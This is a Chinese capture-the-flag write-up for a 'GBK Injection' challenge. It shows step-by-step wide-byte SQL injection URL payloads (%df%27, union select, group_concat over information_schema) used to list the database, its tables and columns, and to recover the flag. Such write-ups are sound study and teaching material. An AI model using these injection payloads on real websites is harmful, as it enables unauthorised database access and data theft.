CG CTF GBK Injection

╄→гoц情女王★ 提交于 2020-02-23 21:53:24

题目链接

GBK Injection想到宽字节注入,首先了解宽字节注入的原理 链接

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2#
在这里插入图片描述
发现#被过滤掉了,遂使用%23(url编码)

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2%23
在这里插入图片描述

判断出表中有两列,就可以用:union select获取当前的库了
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 union select 1,database()%23
在这里插入图片描述
没有爆出库的信息emm…因为没有and 1=2,又因为这个地方可能只接受一个参数
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,database()%23

在这里插入图片描述
当前的库名为sae-chinalover,通过库名爆表名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652D6368696E616C6F766572%23
在这里插入图片描述
爆news表的列
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x6E657773%23
在这里插入图片描述
得出id,title两列
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(id,title) from news limit 0,1%23

发现没有flag,按照上面的流程重复

在ctf4表中找到flag

flag{this_is_sqli_flag}

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!